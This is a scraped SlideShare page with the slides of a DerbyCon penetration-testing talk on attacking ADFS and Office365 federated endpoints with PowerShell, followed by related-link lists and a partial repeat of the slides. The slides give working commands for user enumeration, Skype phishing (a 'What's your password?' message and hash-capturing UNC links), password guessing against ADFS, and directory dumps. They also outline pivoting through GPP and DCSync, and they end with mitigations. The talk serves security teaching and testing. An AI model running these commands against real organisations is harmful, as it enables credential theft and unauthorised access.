Karl Fosaaen, profile picture
Uploaded byKarl Fosaaen
PPTX, PDF3,076 views

Attacking ADFS Endpoints - DerbyCon

The document presents a detailed examination of attacks on Active Directory Federation Services (ADFS) using PowerShell, covering user enumeration, phishing, and dictionary attacks. It provides a comprehensive guide on setting up a test environment, identifying federated endpoints, and mitigation strategies to enhance security. Key insights include the importance of dual-factor authentication and monitoring of federated services to protect against common vulnerabilities.

Technology
Related topics:
Penetration-Testing

Embed presentation

Downloaded 28 times
Attacking ADFS Endpoints with PowerShell Karl Fosaaen
Introductions • Who am I? ‒Karl Fosaaen • What do I do? ‒Wear lots of hats ‒Pen Testing ‒Password Cracking ‒Social Engineering ‒Blog ‒DEF CON Swag Goon ‒Pinball Repair
Introductions • Hacker Jeopardy Champion
Slides Overview • ADFS Overview • Attack Walkthroughs ‒ Identifying Federated Endpoints ‒ Setting Up Your Test Environment ‒ User Enumeration ‒ Email Validation and Social Engineering Recon ‒ Skype Message Phishing ‒ Dictionary Attacks Against Federated Accounts ‒ Enumeration of Other Federated Domain Users ‒ Pivoting to the Internal Network • Attack Mitigations • Conclusions/Questions
ADFS Overview
ADFS Overview Active Directory Federation Services (AD FS) “is a standards-based service that allows the secure sharing of identity information between trusted business partners (known as a federation) across an extranet.” Source: https://msdn.microsoft.com/en-us/library/bb897402.aspx
ADFS Overview Some Terms: ‒ IdP ‒ SAML ‒ WS-Federation ‒ WS-Trust ‒ ADAL
ADFS Overview Federation can mean many things ‒ Domain to Domain ‒ Domain to Microsoft ‒ Arbitrary meanings based off of forum posts
ADFS Overview Frequently Federated Services • Office365 • Skype for Business • Exchange • Azure AD • SharePoint • Apps in General
Attack Walkthroughs • Identifying Federated Endpoints • Setting Up Your Test Environment • User Enumeration • Email Validation and Social Engineering Recon • Skype Message Phishing • Dictionary Attacks Against Federated Accounts • Enumeration of Other Federated Domain Users • Pivoting to the Internal Network
Identifying Federated Endpoints
Identifying Federated Endpoints Side Note: • Office365 had an Authentication Bypass issue ‒ Insecure SAML assertions ‒ Affected all federated Office365 domains ‒ They called out this method in their blog post Source: http://www.economyofmechanism.com/office365- authbypass.html
Identifying Federated Endpoints • Using Microsoft Online
Identifying Federated Endpoints • Example user check request
Identifying Federated Endpoints • Microsoft’s Responses ‒ Federated Domain ‒ Microsoft Managed Domain
ADFS Overview Diagram of (Managed) O365 federation
ADFS Overview Diagram of (Federated) O365 federation
Identifying Federated Endpoints • Let’s wrap it in a PowerShell script ‒ Federated Domain ‒ Microsoft Managed Domain https://blog.netspi.com/using-powershell-identify-federated-domains/ https://github.com/NetSPI/PowerShell/blob/master/Get-ADFSEndpoint.ps1
Identifying Federated Endpoints • Multiple domains at once https://blog.netspi.com/using-powershell-identify-federated-domains/ https://github.com/NetSPI/PowerShell/blob/master/Get-ADFSEndpoint.ps1
Identifying Federated Endpoints • Using DNS TXT records
Identifying Federated Endpoints • Using DNS TXT records • Look for the MS=* records
Identifying Federated Endpoints • What about the top 1 million Alexa sites? ‒ 47,455 (4.7%) of the top 1 Million have “ms=ms*” records • DNS can be a pain at a million records *Still better than a million HTTP requests to Microsoft • Other options ‒ ADFS.domain.com ‒ STS.domain.com
Setting Up Your Test Environment
Setting Up Your Test Environment • Basic Overview ‒ Buy/Have a domain ‒ Set up/Purchase Skype for Business* ‒ Install Skype for Business Client* ‒ Install Lync 2013 SDK* ‒ Get the NetSPI PowerShell Modules ‒ Install Azure AD PowerShell module *Note: This is only needed for testing federated Skype for Business
Setting Up Your Test Environment • Buy your domain
Setting Up Your Test Environment • Get hosted Office365 services ‒ Or set up your own server
Setting Up Your Test Environment • Add your domain to the Office365 portal
Setting Up Your Test Environment • Set up your user and enable federation
Setting Up Your Test Environment • Install Skype for Business and the Lync SDK ‒ Requires Visual Studio 2010 for the easiest install https://www.microsoft.com/en-us/download/details.aspx?id=36824
Setting Up Your Test Environment • Login to Skype for Business as your user
Setting Up Your Test Environment • Grab the PowerShell modules from NetSPI • https://github.com/NetSPI/PowerShell/blob/master/Power Skype.ps1 • https://github.com/NetSPI/PowerShell/blob/master/Get- ADFSEndpoint.ps1
Setting Up Your Test Environment • Install the Azure AD PowerShell Module • https://msdn.microsoft.com/en- us/library/azure/jj151815(v=azure.98).aspx
User Enumeration
User Enumeration • We have: ‒ Some Targets/Endpoints ‒ A testing environment • We need: ‒ Some users to attack • Enumerate some users for the organization off of LinkedIn • Use one of the many recon frameworks • Check out the User enumeration work that nyxgeek spoke about on Friday
Email Validation and Social Engineering Recon
Email Validation and SE Recon • Using our federated Skype, we can find information about other federated Skype users • Just open a chat with them
Email Validation and SE Recon • Or we can just chat with these CEOs
Email Validation and SE Recon • Let’s just wrap it with PowerShell instead Get-SkypeStatus -inputFile test_emails.txt | ft -AutoSize
Email Validation and SE Recon
Email Validation and SE Recon Demo • Get-SkypeStatus -inputFile "C:TempLiveAdmins.txt" | ft -AutoSize • It helps if we run it a couple of times…
Email Validation and SE Recon
Email Validation and SE Recon • What about the top 1 million Alexa sites • Of those 47,455 “ms=ms*” records ‒ 45 have “Administrator” accounts that have federated Skype for Business accounts ‒ None of those were actively online during testing… ‒ From nyxgeek: • 38,658 (3.8%) have hostname http://lyncdiscover.domain.com • 486 of 995 unique (Fortune 1000 - 2015) domain names • Note: ‒ Skype doesn’t like opening 2,000+ conversations at a time
Skype Message Phishing
Skype Message Phishing Send-SkypeMessage -email test@example.com -message "What's your password?" Get-SkypeStatus -inputFile 'C:Emails.txt' | Select Email,Status | where Status -Match "Available" | select Email | Send-SkypeMessage …
Email Validation and SE Recon Demo • Get-SkypeStatus -email karl.fosaaen@netspi.com • Invoke-SendSkypeMessage -email karl.fosaaen@netspi.com -message "Hello from Derbycon" • for ($i = 0; $i -lt 10; $i++){Invoke- SendSkypeMessage -email karl.fosaaen@netspi.com -message "Hello $i"}
Email Validation and SE Recon
Email Validation and SE Recon
Email Validation and SE Recon Demo • Invoke-SendSkypeMessage -email karl.fosaaen@netspi.com - message "192.168.1.123test” • Invoke-SendSkypeMessage -email karl.fosaaen@netspi.com - message “www.microsoftsupport.online" • SMB capture/relay running on internal network • UNC works on internal, HRefs work for external • Send this message out to a group, get or relay hashes
Skype Message Phishing • Further Work ‒ Grab a domains worth of phone numbers • Got this working while making these slides… • Should work if you already have creds ‒ Brute-Forcing Skype Creds • Not easy with the Lync SDK • Nyxgeek has some great methods that will be added to PowerSkype
Dictionary Attacks Against Federated Accounts
Dictionary Attacks Against ADFS • Get-ADFSEndpoint gives us the appropriate command to run for the domain ‒ Federated Domain
Dictionary Attacks Against ADFS • Invoke-ADFSSecurityTokenRequest* Invoke-ADFSSecurityTokenRequest -ClientCredentialType UserName -ADFSBaseUri https://adfs.example.com/ -AppliesTo https://adfs.example.com/adfs/services/trust/13/usernamemixed -UserName 'karl.fosaaen‘ -Password 'Winter2016‘ -Domain ‘example.com‘ -OutputType Token -SAMLVersion 2 -IgnoreCertificateErrors https://blogs.msdn.microsoft.com/besidethepoint/2012/10/17/request-adfs-security- token-with-powershell/
Dictionary Attacks Against ADFS • Get-ADFSEndpoint gives us the appropriate command to run for the domain ‒ Microsoft Managed Domain
Dictionary Attacks Against ADFS • Connect-msolservice – AzureAD PS Module
Enumeration of Other Federated Domain Users
Enumeration of Other Domain Users • Not totally necessary, but it can be handy 1. $msolcred = get-credential 2. connect-msolservice -credential $msolcred 3. Get-MsolUser -All | ft –AutoSize • This also works for apps using AzureAD for account management
Enumeration of Other Domain Users • Using the Graph API
Enumeration of Other Domain Users • Using the Graph API $token = Get-GraphAPIToken -TenantName DOMAIN_GOES_HERE Get-GraphData -Token $token -Tenant DOMAIN_GOES_HERE -Resource users ‒ This works for federated and managed domains • Github – https://github.com/NetSPI/PowerShell/blob/master/Get- GraphAPIToken.ps1
Enumeration of Other Domain Users Demo • $token = Get-GraphAPIToken -TenantName microsoftsupport.online • Get-GraphData -Token $token -Tenant microsoftsupport.online -Resource users
Enumeration of Other Domain Users
Enumeration of Other Domain Users • Use Exchange online for non-MS managed domains • If the domain uses Office365, you can connect to it with PowerShell
Enumeration of Other Domain Users • Use Exchange online for non-MS managed domains (1/2) $PWord = ConvertTo-SecureString -String 'Summer2016' -AsPlainText –Force $credentials = New-Object -TypeName "System.Management.Automation.PSCredential " -ArgumentList "test@example.com", $PWord
Enumeration of Other Domain Users • Use Exchange online for non-MS managed domains that have OWA tied to O365 (2/2) Invoke-Command -ConfigurationName Microsoft.Exchange -ConnectionUri https://outlook.office365.com/powershell-liveid/ -Credential $Credentials -Authentication Basic -AllowRedirection -ScriptBlock {Get-Recipient -ResultSize unlimited} | Export-CSV c:tempemail_users.csv -NoTypeInformation
Enumeration of Other Domain Users
Pivoting to the Internal Network
Pivoting to the Internal Network • Single Factor VPN Example ‒ Enumerated user emails on LinkedIn ‒ Guessed passwords against MSOnline with PowerShell ‒ Enumerated VPN interfaces ‒ Logged in with guessed credentials ‒ GPP -> Local admin on DA system ‒ DCSync • “Store passwords using reversible encryption”
Pivoting to the Internal Network • Other Routes ‒ Single Factor Services • Management Protocols • RDP • SSH • Sharepoint • Terminal Services – Web Based • Citrix • VDI • Etc.
Pivoting to the Internal Network • Malicious OneDrive Documents ‒ Can’t use macros in the online version of excel
Pivoting to the Internal Network • Malicious SharePoint Documents ‒ Same concept as OneDrive, just a different platform ‒ Backdoor a document ‒ Edit pages
Pivoting to the Internal Network • Send messages from OWA or Skype for Business ‒ Autodiscover is handy ‒ People will trust their co-workers • “Can you look over this word doc for me?”
Pivoting to the Internal Network • Attacking Email Accounts ‒ If Autodiscover is enabled, adding an account can be done from anywhere ‒ Email is interesting, but I’d like a shell ‒ This can not be done programmatically with PowerShell (*Easily) ‒ “Malicious Outlook Rules” • Nick Landers – Silent Break Security ‒ “MAPI over HTTP and Mailrule Pwnage” • Etienne - sensepost
Attack Mitigations
Attack Mitigations • Enable Dual factor authentication for external endpoints* *On all channels
Attack Mitigations • Limit federation to trusted domains • Limit exposed services surface area • Monitor your Federated and Azure endpoints • Enforce strong password requirements
Thanks! • My NetSPI Co-workers ‒ QA/Ideas/Suggestions • My NetSPI Management Team ‒ For giving me time to work on this • Jared Bird - @jaredbird ‒ For asking me about federation years ago
Questions Questions? Karl Fosaaen @kfosaaen https://blog.netspi.com https://github.com/netspi http://www.slideshare.net/kfosaaen

More Related Content

PDF
Web App Security Presentation by Ryan Holland - 05-31-2017
byTriNimbus
 
PDF
ReCertifying Active Directory
byWill Schroeder
 
PPTX
F5 SIRT - F5 ASM WAF - DDoS protection
byLior Rotkovitch
 
PDF
aclpwn - Active Directory ACL exploitation with BloodHound
byDirkjanMollema
 
PDF
Windows attacks - AT is the new black
byChris Gates
 
PPTX
Abusing Microsoft Kerberos - Sorry you guys don't get it
byBenjamin Delpy
 
PDF
Red Team Tactics for Cracking the GSuite Perimeter
byMike Felch
 
PDF
Time based CAPTCHA protected SQL injection through SOAP-webservice
byFrans Rosén
 
Web App Security Presentation by Ryan Holland - 05-31-2017
byTriNimbus
 
ReCertifying Active Directory
byWill Schroeder
 
F5 SIRT - F5 ASM WAF - DDoS protection
byLior Rotkovitch
 
aclpwn - Active Directory ACL exploitation with BloodHound
byDirkjanMollema
 
Windows attacks - AT is the new black
byChris Gates
 
Abusing Microsoft Kerberos - Sorry you guys don't get it
byBenjamin Delpy
 
Red Team Tactics for Cracking the GSuite Perimeter
byMike Felch
 
Time based CAPTCHA protected SQL injection through SOAP-webservice
byFrans Rosén
 

What's hot

PDF
12-Step Program for Scaling Web Applications on PostgreSQL
byKonstantin Gredeskoul
 
PPTX
Security Code Review 101
byPaul Ionescu
 
PPT
SSL Nedir
byKobicini Yazılım
 
PDF
Credential store using HashiCorp Vault
byMayank Patel
 
PDF
Attacker's Perspective of Active Directory
bySunny Neo
 
PDF
Spring Day | Identity Management with Spring Security | Dave Syer
byJAX London
 
PPT
XSS - Attacks & Defense
byBlueinfy Solutions
 
PDF
A Threat Hunter Himself
bySergey Soldatov
 
PDF
Attacking and Securing WPA Enterprise Networks
byNortheast Ohio Information Security Forum
 
PPTX
Metasploit
byParth Sahu
 
PPTX
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSF
byAjin Abraham
 
PPTX
Owasp Top 10 A1: Injection
byMichael Hendrickx
 
PPTX
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
byBlueHat Security Conference
 
PDF
Part 2 - Local Name Resolution in Windows Networks
byMen and Mice
 
PPTX
Pentesting Android Applications
byCláudio André
 
PDF
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
byFrans Rosén
 
PDF
Not a Security Boundary
byWill Schroeder
 
PPT
Web Application Security Testing
byMarco Morana
 
PDF
Windows logging cheat sheet
byMichael Gough
 
PDF
Malware Evasion Techniques
byThomas Roccia
 
12-Step Program for Scaling Web Applications on PostgreSQL
byKonstantin Gredeskoul
 
Security Code Review 101
byPaul Ionescu
 
SSL Nedir
byKobicini Yazılım
 
Credential store using HashiCorp Vault
byMayank Patel
 
Attacker's Perspective of Active Directory
bySunny Neo
 
Spring Day | Identity Management with Spring Security | Dave Syer
byJAX London
 
XSS - Attacks & Defense
byBlueinfy Solutions
 
A Threat Hunter Himself
bySergey Soldatov
 
Attacking and Securing WPA Enterprise Networks
byNortheast Ohio Information Security Forum
 
Metasploit
byParth Sahu
 
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSF
byAjin Abraham
 
Owasp Top 10 A1: Injection
byMichael Hendrickx
 
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
byBlueHat Security Conference
 
Part 2 - Local Name Resolution in Windows Networks
byMen and Mice
 
Pentesting Android Applications
byCláudio André
 
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
byFrans Rosén
 
Not a Security Boundary
byWill Schroeder
 
Web Application Security Testing
byMarco Morana
 
Windows logging cheat sheet
byMichael Gough
 
Malware Evasion Techniques
byThomas Roccia
 

Viewers also liked

PDF
Jmeter ile uygulama katmanında yük testi gerçekleştirme
byBTRisk Bilgi Güvenliği ve BT Yönetişim Hizmetleri
 
PPTX
DerbyCon2016 - Hacking SQL Server on Scale with PowerShell
byScott Sutherland
 
PDF
Normshield - Cloud Based Vulnerability Scan Service
byBGA Cyber Security
 
PPTX
ISTSEC 2013 - Fuzzy Tabanlı Zaafiyet Araştırması
byBGA Cyber Security
 
PDF
GRE Nedir
byMert Hakki Bingol
 
PDF
Vim Cheatsheet penguen-efendi.com
byMert Hakki Bingol
 
PDF
Türkiye Sosyal Medya Pazarlama Trendleri
byErol Dizdar
 
PPTX
ISTSEC 2013 - Kurumsal Ağlarda Kullanılan Güvenlik Sistemlerini Atlatma
byBGA Cyber Security
 
PDF
Turkcell maxi iq
byErol Dizdar
 
PDF
DevOps ile Siber Tehditler Karşısında 360 Derece Alan Hakimiyeti
byBGA Cyber Security
 
PDF
TBMM Bilişim ve İnternet Araştırma Komisyonu: Günümüz Dünyasında İnternetin S...
byErol Dizdar
 
PDF
Simtech mobil yarış simulatörü platformu
byErol Dizdar
 
PDF
State of the Global Mobile Consumer: Connectivity is core
byErol Dizdar
 
DOC
Model relational
bylikut101010
 
PDF
Never Settle: Reloaded
byErol Dizdar
 
PDF
Türkiye'de Mobil Tüketiciyi Anlama Mayıs 2013
byErol Dizdar
 
PDF
Yurt dışından getirilen telefonlar e-devlet'ten kayıt edilebilecek
byErol Dizdar
 
PDF
Facebook'taki Türk Bankaları
byErol Dizdar
 
PDF
Kısıtlar İçerecek Şekilde Revize Edilmiş Atama Algoritmasına Ait Bir Uygulama...
byCan K.
 
PDF
ISTSEC 2013 - Garibanın APT Tespit Aracı
byBGA Cyber Security
 
Jmeter ile uygulama katmanında yük testi gerçekleştirme
byBTRisk Bilgi Güvenliği ve BT Yönetişim Hizmetleri
 
DerbyCon2016 - Hacking SQL Server on Scale with PowerShell
byScott Sutherland
 
Normshield - Cloud Based Vulnerability Scan Service
byBGA Cyber Security
 
ISTSEC 2013 - Fuzzy Tabanlı Zaafiyet Araştırması
byBGA Cyber Security
 
GRE Nedir
byMert Hakki Bingol
 
Vim Cheatsheet penguen-efendi.com
byMert Hakki Bingol
 
Türkiye Sosyal Medya Pazarlama Trendleri
byErol Dizdar
 
ISTSEC 2013 - Kurumsal Ağlarda Kullanılan Güvenlik Sistemlerini Atlatma
byBGA Cyber Security
 
Turkcell maxi iq
byErol Dizdar
 
DevOps ile Siber Tehditler Karşısında 360 Derece Alan Hakimiyeti
byBGA Cyber Security
 
TBMM Bilişim ve İnternet Araştırma Komisyonu: Günümüz Dünyasında İnternetin S...
byErol Dizdar
 
Simtech mobil yarış simulatörü platformu
byErol Dizdar
 
State of the Global Mobile Consumer: Connectivity is core
byErol Dizdar
 
Model relational
bylikut101010
 
Never Settle: Reloaded
byErol Dizdar
 
Türkiye'de Mobil Tüketiciyi Anlama Mayıs 2013
byErol Dizdar
 
Yurt dışından getirilen telefonlar e-devlet'ten kayıt edilebilecek
byErol Dizdar
 
Facebook'taki Türk Bankaları
byErol Dizdar
 
Kısıtlar İçerecek Şekilde Revize Edilmiş Atama Algoritmasına Ait Bir Uygulama...
byCan K.
 
ISTSEC 2013 - Garibanın APT Tespit Aracı
byBGA Cyber Security
 

Similar to Attacking ADFS Endpoints - DerbyCon

PDF
Red Team Methodology - A Naked Look
byJason Lang
 
PDF
Carlos García - Pentesting Active Directory [rooted2018]
byRootedCON
 
PPTX
Troopers 19 - I am AD FS and So Can You
byDouglas Bienstock
 
PDF
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
byGabriel Mathenge
 
PPTX
It's just Skype for Business - THOTCON
byKarl Fosaaen
 
PDF
Keynote - Cloudy Vision: How Cloud Integration Complicates Security
byCloudVillage
 
PPTX
T28 implementing adfs and hybrid share point
byThorbjørn Værp
 
PDF
Tips to Remediate your Vulnerability Management Program
byBeyondTrust
 
PDF
Windows Server 2019 Inside Out 1st Edition Orin Thomas & Brad Price
byqarifmacom
 
PPTX
SharePoint 2013 and ADFS
byNatallia Makarevich
 
PPTX
Adversary tactics config mgmt-&-logs-oh-my
byJesse Moore
 
PPTX
Externally Testing Modern AD Domains - Arcticcon
byKarl Fosaaen
 
PPTX
Automating Attacks Against Office365 - BsidesPDX 2016
byKarl Fosaaen
 
PPTX
BSides SG Practical Red Teaming Workshop
byAjay Choudhary
 
PPTX
Spsnj case study 2014
byJoseph Karam
 
PPTX
BSIDES-PR Keynote Hunting for Bad Guys
byJoff Thyer
 
PDF
Gartner Security & Risk Management Summit 2018
byPaula Januszkiewicz
 
PDF
Tietoturvallisuuden_kevatseminaari_2013_Jarno_Niemela
byValtiokonttori / Statskontoret / State Treasury of Finland
 
PPTX
Security-Top-10-Penetration-Findings.pptx
byssuser5a0ad11
 
PPTX
Top 10 ways to make hackers excited: All about the shortcuts not worth taking
byPaula Januszkiewicz
 
Red Team Methodology - A Naked Look
byJason Lang
 
Carlos García - Pentesting Active Directory [rooted2018]
byRootedCON
 
Troopers 19 - I am AD FS and So Can You
byDouglas Bienstock
 
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
byGabriel Mathenge
 
It's just Skype for Business - THOTCON
byKarl Fosaaen
 
Keynote - Cloudy Vision: How Cloud Integration Complicates Security
byCloudVillage
 
T28 implementing adfs and hybrid share point
byThorbjørn Værp
 
Tips to Remediate your Vulnerability Management Program
byBeyondTrust
 
Windows Server 2019 Inside Out 1st Edition Orin Thomas & Brad Price
byqarifmacom
 
SharePoint 2013 and ADFS
byNatallia Makarevich
 
Adversary tactics config mgmt-&-logs-oh-my
byJesse Moore
 
Externally Testing Modern AD Domains - Arcticcon
byKarl Fosaaen
 
Automating Attacks Against Office365 - BsidesPDX 2016
byKarl Fosaaen
 
BSides SG Practical Red Teaming Workshop
byAjay Choudhary
 
Spsnj case study 2014
byJoseph Karam
 
BSIDES-PR Keynote Hunting for Bad Guys
byJoff Thyer
 
Gartner Security & Risk Management Summit 2018
byPaula Januszkiewicz
 
Tietoturvallisuuden_kevatseminaari_2013_Jarno_Niemela
byValtiokonttori / Statskontoret / State Treasury of Finland
 
Security-Top-10-Penetration-Findings.pptx
byssuser5a0ad11
 
Top 10 ways to make hackers excited: All about the shortcuts not worth taking
byPaula Januszkiewicz
 

Recently uploaded

PPTX
Expanding Your Toolbox: Beginners Guide to Controlling Kubernetes Logs
byEric D. Schabell
 
PDF
Automating ArcGIS Enterprise Compliance for Operational Excellence
bySafe Software
 
PPTX
Governance, Deployment & Methodologies for Agentic Automation [2/3]
bysuhanisingh58689
 
PPTX
Odoo_by_Infinys_All_in_One_Business_Solution_for_Small_Companies.pptx
byAgusto Sipahutar
 
PDF
Manage Networking in RHEL - RHCSA (RH124).pdf
byLinuxCert Guru
 
PPTX
Getting Started with MSP360 Backup for M365/Google
byMSP360
 
PDF
MathML Core in WebKit
byIgalia
 
PDF
Transparency Exchange API: How Do You Find the SBOM for a Smart Light Bulb?
byPavel Shukhman
 
PDF
Upskill to Agentic Automation - Accelerating Your Job Search using AI
byDianaGray10
 
PDF
Do more with the HP Z2 Mini G1a
byPrincipled Technologies
 
PDF
The Complete Crypto Airdrop Playbook: Strategies, Scams & Success Stories | 3...
by3verseTV
 
PPTX
Career Blueprint - Future Career Vision & Success Stories - 2025 - Part 1
byDianaGray10
 
PPTX
Sephora UAE API Service Real-Time Product & Price Data Access.pptx
bycreativeclicks1733
 
PDF
From Pixels to Insights: Getting Started with Imagery in FME
bySafe Software
 
PDF
Wrapping up unowned UTF8 C strings: CStringView
byIgalia
 
PDF
Manage Local Users and Groups - RHCSA (RH124)
byLinuxCert Guru
 
PDF
Cybersecurity in ASEAN and Singapore Columbia SIPA 2025.pdf
byBenjamin Ang
 
PDF
Create, View and Edit Text Files - RHCSA (RH124).pdf
byLinuxCert Guru
 
PDF
Install and Update Software - RHCSA (RH124).pdf
byLinuxCert Guru
 
PDF
Private Governance: How Decentralized Mechanisms Can Regulate the Crypto Economy
byFederico Ast
 
Expanding Your Toolbox: Beginners Guide to Controlling Kubernetes Logs
byEric D. Schabell
 
Automating ArcGIS Enterprise Compliance for Operational Excellence
bySafe Software
 
Governance, Deployment & Methodologies for Agentic Automation [2/3]
bysuhanisingh58689
 
Odoo_by_Infinys_All_in_One_Business_Solution_for_Small_Companies.pptx
byAgusto Sipahutar
 
Manage Networking in RHEL - RHCSA (RH124).pdf
byLinuxCert Guru
 
Getting Started with MSP360 Backup for M365/Google
byMSP360
 
MathML Core in WebKit
byIgalia
 
Transparency Exchange API: How Do You Find the SBOM for a Smart Light Bulb?
byPavel Shukhman
 
Upskill to Agentic Automation - Accelerating Your Job Search using AI
byDianaGray10
 
Do more with the HP Z2 Mini G1a
byPrincipled Technologies
 
The Complete Crypto Airdrop Playbook: Strategies, Scams & Success Stories | 3...
by3verseTV
 
Career Blueprint - Future Career Vision & Success Stories - 2025 - Part 1
byDianaGray10
 
Sephora UAE API Service Real-Time Product & Price Data Access.pptx
bycreativeclicks1733
 
From Pixels to Insights: Getting Started with Imagery in FME
bySafe Software
 
Wrapping up unowned UTF8 C strings: CStringView
byIgalia
 
Manage Local Users and Groups - RHCSA (RH124)
byLinuxCert Guru
 
Cybersecurity in ASEAN and Singapore Columbia SIPA 2025.pdf
byBenjamin Ang
 
Create, View and Edit Text Files - RHCSA (RH124).pdf
byLinuxCert Guru
 
Install and Update Software - RHCSA (RH124).pdf
byLinuxCert Guru
 
Private Governance: How Decentralized Mechanisms Can Regulate the Crypto Economy
byFederico Ast
 
In this document
Powered by AI

Overview of the presentation's focus on ADFS endpoints and the speaker's experience in penetration testing.

Introduction to Active Directory Federation Services (ADFS), its purpose, and commonly federated services.

Detailed methods for identifying federated endpoints including PowerShell scripts, DNS records, and statistics on domain records.

Necessary steps for creating a test environment including domain setup, Skype for Business, and installation of required tools.

Strategies to enumerate users within an organization utilizing LinkedIn and recon frameworks.

Methods for validating email addresses and conducting social engineering reconnaissance via federated Skype accounts.

Techniques for conducting phishing attacks over Skype, including demo commands using PowerShell.

Utilization of PowerShell commands to perform dictionary attacks against ADFS accounts.

Methods for enumerating users in other federated domains using PowerShell and Graph API.

Techniques for accessing internal networks after gaining initial access through federated services.

Recommendations for securing ADFS endpoints, including dual-factor authentication and limited federation.

Thanks to colleagues and an invitation for questions regarding the presentation topics.

Attacking ADFS Endpoints - DerbyCon

  • 1.
    Attacking ADFS Endpointswith PowerShell Karl Fosaaen
  • 2.
    Introductions • Who amI? ‒Karl Fosaaen • What do I do? ‒Wear lots of hats ‒Pen Testing ‒Password Cracking ‒Social Engineering ‒Blog ‒DEF CON Swag Goon ‒Pinball Repair
  • 3.
  • 4.
    Slides Overview • ADFSOverview • Attack Walkthroughs ‒ Identifying Federated Endpoints ‒ Setting Up Your Test Environment ‒ User Enumeration ‒ Email Validation and Social Engineering Recon ‒ Skype Message Phishing ‒ Dictionary Attacks Against Federated Accounts ‒ Enumeration of Other Federated Domain Users ‒ Pivoting to the Internal Network • Attack Mitigations • Conclusions/Questions
  • 5.
  • 6.
    ADFS Overview Active DirectoryFederation Services (AD FS) “is a standards-based service that allows the secure sharing of identity information between trusted business partners (known as a federation) across an extranet.” Source: https://msdn.microsoft.com/en-us/library/bb897402.aspx
  • 7.
    ADFS Overview Some Terms: ‒IdP ‒ SAML ‒ WS-Federation ‒ WS-Trust ‒ ADAL
  • 8.
    ADFS Overview Federation canmean many things ‒ Domain to Domain ‒ Domain to Microsoft ‒ Arbitrary meanings based off of forum posts
  • 9.
    ADFS Overview Frequently FederatedServices • Office365 • Skype for Business • Exchange • Azure AD • SharePoint • Apps in General
  • 10.
    Attack Walkthroughs • IdentifyingFederated Endpoints • Setting Up Your Test Environment • User Enumeration • Email Validation and Social Engineering Recon • Skype Message Phishing • Dictionary Attacks Against Federated Accounts • Enumeration of Other Federated Domain Users • Pivoting to the Internal Network
  • 11.
  • 12.
    Identifying Federated Endpoints SideNote: • Office365 had an Authentication Bypass issue ‒ Insecure SAML assertions ‒ Affected all federated Office365 domains ‒ They called out this method in their blog post Source: http://www.economyofmechanism.com/office365- authbypass.html
  • 13.
  • 14.
    Identifying Federated Endpoints •Example user check request
  • 15.
    Identifying Federated Endpoints •Microsoft’s Responses ‒ Federated Domain ‒ Microsoft Managed Domain
  • 16.
    ADFS Overview Diagram of(Managed) O365 federation
  • 17.
    ADFS Overview Diagram of(Federated) O365 federation
  • 18.
    Identifying Federated Endpoints •Let’s wrap it in a PowerShell script ‒ Federated Domain ‒ Microsoft Managed Domain https://blog.netspi.com/using-powershell-identify-federated-domains/ https://github.com/NetSPI/PowerShell/blob/master/Get-ADFSEndpoint.ps1
  • 19.
    Identifying Federated Endpoints •Multiple domains at once https://blog.netspi.com/using-powershell-identify-federated-domains/ https://github.com/NetSPI/PowerShell/blob/master/Get-ADFSEndpoint.ps1
  • 20.
  • 21.
    Identifying Federated Endpoints •Using DNS TXT records • Look for the MS=* records
  • 22.
    Identifying Federated Endpoints •What about the top 1 million Alexa sites? ‒ 47,455 (4.7%) of the top 1 Million have “ms=ms*” records • DNS can be a pain at a million records *Still better than a million HTTP requests to Microsoft • Other options ‒ ADFS.domain.com ‒ STS.domain.com
  • 23.
    Setting Up YourTest Environment
  • 24.
    Setting Up YourTest Environment • Basic Overview ‒ Buy/Have a domain ‒ Set up/Purchase Skype for Business* ‒ Install Skype for Business Client* ‒ Install Lync 2013 SDK* ‒ Get the NetSPI PowerShell Modules ‒ Install Azure AD PowerShell module *Note: This is only needed for testing federated Skype for Business
  • 25.
    Setting Up YourTest Environment • Buy your domain
  • 26.
    Setting Up YourTest Environment • Get hosted Office365 services ‒ Or set up your own server
  • 27.
    Setting Up YourTest Environment • Add your domain to the Office365 portal
  • 28.
    Setting Up YourTest Environment • Set up your user and enable federation
  • 29.
    Setting Up YourTest Environment • Install Skype for Business and the Lync SDK ‒ Requires Visual Studio 2010 for the easiest install https://www.microsoft.com/en-us/download/details.aspx?id=36824
  • 30.
    Setting Up YourTest Environment • Login to Skype for Business as your user
  • 31.
    Setting Up YourTest Environment • Grab the PowerShell modules from NetSPI • https://github.com/NetSPI/PowerShell/blob/master/Power Skype.ps1 • https://github.com/NetSPI/PowerShell/blob/master/Get- ADFSEndpoint.ps1
  • 32.
